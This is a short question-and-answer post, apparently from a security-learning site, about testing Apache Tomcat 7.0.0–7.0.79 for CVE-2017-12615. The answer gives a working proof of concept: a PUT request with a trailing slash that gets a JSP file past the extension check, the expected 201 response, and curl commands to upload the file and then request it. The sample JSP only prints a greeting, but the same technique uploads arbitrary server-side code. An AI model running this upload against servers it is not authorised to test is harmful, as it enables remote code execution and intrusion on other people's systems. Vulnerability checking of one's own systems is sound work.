Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

0 votes

How can I check the vulnerability for Apache Tomcat 7.0.0 to 7.0.79 (CVE-2017-12615)?

by (111 points)

1 Answer

0 votes

You can bypass the file extension check by inserting a '/' character after the filename's extension.

HTTP Request:

PUT /file.jsp/

Host: localhost:port

Connection: close

Content-Length: 85

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created

Server: Apache-Coyote/1.1

Content-Length: 0

Date: Sat, 23 Sep 2017 06:36:36 GMT

Connection: close

Exploit using 'curl':

Create a .jsp file (e.g. testfile.jsp):

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

cURL command on target server:

curl -X PUT http://localhost:port/testfile.jsp/ -d @- < testfile.jsp

Check the file by browsing to the target address or:

curl http://localhost:port/testfile.jsp

by (169 points)
...